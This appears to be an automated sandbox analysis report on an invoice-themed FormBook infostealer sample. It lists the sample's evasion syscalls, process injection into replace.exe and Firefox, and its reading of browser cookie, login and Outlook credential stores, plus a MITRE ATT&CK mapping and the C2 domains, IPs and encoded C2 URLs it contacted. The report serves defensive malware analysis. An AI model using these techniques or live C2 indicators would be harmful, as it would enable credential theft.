            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01026DA0 mov eax, dword ptr fs:[00000030h]2_2_01026DA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B8DAE mov eax, dword ptr fs:[00000030h]2_2_010B8DAE
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B8DAE mov eax, dword ptr fs:[00000030h]2_2_010B8DAE
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h]2_2_00FFAC50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h]2_2_00FFAC50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h]2_2_00FFAC50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h]2_2_00FFAC50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h]2_2_00FFAC50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h]2_2_00FFAC50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6C50 mov eax, dword ptr fs:[00000030h]2_2_00FF6C50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6C50 mov eax, dword ptr fs:[00000030h]2_2_00FF6C50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6C50 mov eax, dword ptr fs:[00000030h]2_2_00FF6C50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102CDB1 mov ecx, dword ptr fs:[00000030h]2_2_0102CDB1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102CDB1 mov eax, dword ptr fs:[00000030h]2_2_0102CDB1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102CDB1 mov eax, dword ptr fs:[00000030h]2_2_0102CDB1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01018DBF mov eax, dword ptr fs:[00000030h]2_2_01018DBF
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01018DBF mov eax, dword ptr fs:[00000030h]2_2_01018DBF
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01074DD7 mov eax, dword ptr fs:[00000030h]2_2_01074DD7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01074DD7 mov eax, dword ptr fs:[00000030h]2_2_01074DD7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101EDD3 mov eax, dword ptr fs:[00000030h]2_2_0101EDD3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101EDD3 mov eax, dword ptr fs:[00000030h]2_2_0101EDD3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEEC20 mov eax, dword ptr fs:[00000030h]2_2_00FEEC20
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01010DE1 mov eax, dword ptr fs:[00000030h]2_2_01010DE1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: NULL target: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\replace.exeThread register set: target process: 2088Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\replace.exeThread APC queued: target process: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"Jump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"Jump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeQueries volume information: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		312
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427199 Sample: HYCO_Invoices MS2 & MS3.exe Startdate: 17/04/2024 Architecture: WINDOWS Score: 100 29 www.www60270.xyz 2->29 31 www.skibinscy-finanse.pl 2->31 33 6 other IPs or domains 2->33 43 Snort IDS alert for network traffic 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 51 6 other signatures 2->51 10 HYCO_Invoices MS2 & MS3.exe 3 2->10         started        signatures3 49 Performs DNS queries to domains with low reputation 29->49 process4 process5 12 HYCO_Invoices MS2 & MS3.exe 10->12         started        15 HYCO_Invoices MS2 & MS3.exe 10->15         started        signatures6 63 Maps a DLL or memory area into another process 12->63 17 JlRhrxMCYjuGzWWvXkXNzhLX.exe 12->17 injected process7 signatures8 41 Found direct / indirect Syscall (likely to bypass EDR) 17->41 20 replace.exe 13 17->20         started        process9 signatures10 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Modifies the context of a thread in another process (thread injection) 20->57 59 2 other signatures 20->59 23 JlRhrxMCYjuGzWWvXkXNzhLX.exe 20->23 injected 27 firefox.exe 20->27         started        process11 dnsIp12 35 www.skibinscy-finanse.pl 178.211.137.59, 49756, 49757, 49758 TIS-DIALOG-ASRU Ukraine 23->35 37 www.choosejungmann.com 91.195.240.117, 49740, 49741, 49742 SEDO-ASDE Germany 23->37 39 4 other IPs or domains 23->39 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 signatures13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            HYCO_Invoices MS2 & MS3.exe47%ReversingLabsByteCode-MSIL.Trojan.Swotter
            HYCO_Invoices MS2 & MS3.exe41%VirustotalBrowse
            HYCO_Invoices MS2 & MS3.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.www60270.xyz2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
            https://cgqbbu1mvnevcxzh.app1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.maxiwalls.com
            		79.98.25.1
            		truetrue
              		unknown
              www.skibinscy-finanse.pl
              		178.211.137.59
              		truetrue
                		unknown
                www.avoshield.com
                		91.195.240.117
                		truetrue
                  		unknown
                  www.choosejungmann.com
                  		91.195.240.117
                  		truetrue
                    		unknown
                    www.paydayloans3.shop
                    		64.190.62.22
                    		truetrue
                      		unknown
                      fix01.pfw.djamxtvyk.cloudland3.com
                      		52.175.38.24
                      		truefalse
                        		unknown
                        www.colchondealquiler.com
                        		217.76.128.34
                        		truetrue
                          		unknown
                          www.www60270.xyz
                          		unknown
                          		unknowntrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.avoshield.com/aleu/true
                            		unknown
                            http://www.skibinscy-finanse.pl/aleu/true
                              		unknown
                              http://www.choosejungmann.com/aleu/true
                                		unknown
                                http://www.choosejungmann.com/aleu/?QbZ=7syVtg0wm45Xa+0QzpeywUsAZ6yAPvjdu6gzDOasV7nOCe5fUnUhGq++vYwq6UnaX+M1S/9yW1y2BV80NTALyVFlDkUwTwEaqx89+DAXSUPaXuqsOTbI6d4=&PL=0TtPMJQHYLtrue
                                  		unknown
                                  http://www.skibinscy-finanse.pl/aleu/?QbZ=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&PL=0TtPMJQHYLtrue
                                    		unknown
                                    http://www.paydayloans3.shop/aleu/true
                                      		unknown
                                      http://www.colchondealquiler.com/aleu/true
                                        		unknown
                                        http://www.colchondealquiler.com/aleu/?QbZ=heiUU9lLv45IJG5VBKLzBQ/QU5pXOEZ122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloq+HQclTA5c3JDTwCxVF3w8TOe3DJCoRyHmQ=&PL=0TtPMJQHYLtrue
                                          		unknown
                                          http://www.paydayloans3.shop/aleu/?QbZ=jXFvQTK4oWsNW5HZJ/0gKTQct2QKO2STTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZkV7I+j781KbGhsSlxE46GWITw0n47D4H34I=&PL=0TtPMJQHYLtrue
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabreplace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
